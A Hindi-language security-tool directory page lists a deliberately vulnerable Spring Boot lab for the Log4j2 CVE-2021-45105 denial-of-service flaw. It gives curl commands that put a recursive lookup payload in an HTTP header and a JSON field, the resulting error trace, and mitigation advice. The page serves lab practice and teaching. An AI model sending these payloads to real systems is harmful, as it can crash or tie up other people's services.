Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
https-github.com-pravin-pp-log4j2-CVE-2021-45105-1 — # Log4j2 CVE-2021-45105 के प्रति जानबूझकर संवेदनशील नमूना Spring Boot एप्लिकेशन जो कि शोषण का अभ्यास करने और क्राफ्टेड HTTP हेडर के माध्यम से अनंत लूप डिनायल-ऑफ-सर्विस को समझने के लिए है। | Kitploit
उपकरण/GitHubGitHub/dileepdkumar/https-github.com-pravin-pp-log4j2-cve-2021-45105-1
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubdileepdkumar/https-github.com-pravin-pp-log4j2-cve-2021-45105-1

https-github.com-pravin-pp-log4j2-CVE-2021-45105-1

# Log4j2 CVE-2021-45105 के प्रति जानबूझकर संवेदनशील नमूना Spring Boot एप्लिकेशन जो कि शोषण का अभ्यास करने और क्राफ्टेड HTTP हेडर के माध्यम से अनंत लूप डिनायल-ऑफ-सर्विस को समझने के लिए है।

रिपॉजिटरी देखें
24 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

नमूना Log4j2 असुरक्षित एप्लिकेशन (CVE-2021-45105)

प्रभावित संस्करण: 2.0-beta9 से 2.16.0 तक के सभी संस्करण

यह एप्लिकेशन CVE-2021-45105 के प्रति असुरक्षित Spring Boot वेब एप्लिकेशन पर आधारित है।

यह Log4j 2.16.0 का उपयोग करता है।

एप्लिकेशन चलाना

इसे चलाएँ:

Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

शोषण के चरण

  • फिर, निम्न का उपयोग करके एक्सप्लॉइट ट्रिगर करें:
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
  • ध्यान दें कि आउटपुट इन्फिनिट लूप दिखाता है, हालाँकि परीक्षण में यह पता नहीं चला कि यह DoS संसाधन-खपत वाला है, क्योंकि इस इन्फिनिट लूप को प्रोग्राम द्वारा पहचान लिया जाता है और यह एरर देकर बाहर निकल जाता है:

 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	

शमन :

Java 8 (या उससे नए) उपयोगकर्ताओं को रिलीज़ 2.17.0 में अपग्रेड करना चाहिए।

वैकल्पिक रूप से, इसे कॉन्फ़िगरेशन में शमित किया जा सकता है:

लॉगिंग कॉन्फ़िगरेशन में PatternLayout में, ${ctx:loginId} या $${ctx:loginId} जैसे Context Lookups को Thread Context Map पैटर्न (%X, %mdc, या %MDC) से बदलें। अन्यथा, कॉन्फ़िगरेशन में, ${ctx:loginId} या $${ctx:loginId} जैसे Context Lookups के संदर्भ हटा दें, जहाँ वे एप्लिकेशन के बाहरी स्रोतों जैसे HTTP हेडर या उपयोगकर्ता इनपुट से उत्पन्न होते हैं।

टूल डाउनलोड करें